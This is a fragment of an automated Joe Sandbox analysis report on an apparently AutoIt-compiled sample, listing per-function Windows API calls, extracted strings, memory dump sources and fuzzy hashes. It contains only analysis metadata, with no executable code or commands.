                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                          • String ID:
                                          • API String ID: 136442275-0
                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                          APIs
                                          • _wcsncpy.LIBCMT ref: 00467490
                                          • _wcsncpy.LIBCMT ref: 004674BC
                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                          • _wcstok.LIBCMT ref: 004674FF
                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                          • _wcstok.LIBCMT ref: 004675B2
                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                          • _wcslen.LIBCMT ref: 00467793
                                          • _wcscpy.LIBCMT ref: 00467641
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • _wcslen.LIBCMT ref: 004677BD
                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                          • String ID: X
                                          • API String ID: 3104067586-3081909835
                                          • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                          • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                          • _wcslen.LIBCMT ref: 0046CDB0
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                          Strings
                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 440038798-2785691316
                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                          • _wcslen.LIBCMT ref: 004610A3
                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                          • String ID: ThumbnailClass
                                          • API String ID: 4136854206-1241985126
                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                          APIs
                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                          • String ID: 2
                                          • API String ID: 1331449709-450215437
                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                          • __swprintf.LIBCMT ref: 00460915
                                          • __swprintf.LIBCMT ref: 0046092D
                                          • _wprintf.LIBCMT ref: 004609E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                          • API String ID: 3054410614-2561132961
                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                          APIs
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 600699880-22481851
                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DestroyWindow
                                          • String ID: static
                                          • API String ID: 3375834691-2160076837
                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                          • API String ID: 2907320926-3566645568
                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                          APIs
                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                          • DeleteObject.GDI32(006D0000), ref: 00470A04
                                          • DestroyIcon.USER32(00460020), ref: 00470A1C
                                          • DeleteObject.GDI32(B2A93231), ref: 00470A34
                                          • DestroyWindow.USER32(003B0073), ref: 00470A4C
                                          • DestroyIcon.USER32(?), ref: 00470A73
                                          • DestroyIcon.USER32(?), ref: 00470A81
                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 1237572874-0
                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                          • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                          • GetKeyState.USER32(00000011), ref: 00444903
                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                          • String ID:
                                          • API String ID: 3413494760-0
                                          • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                          • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                          • String ID: AU3_FreeVar
                                          • API String ID: 2634073740-771828931
                                          • Opcode ID: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                          • Opcode Fuzzy Hash: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
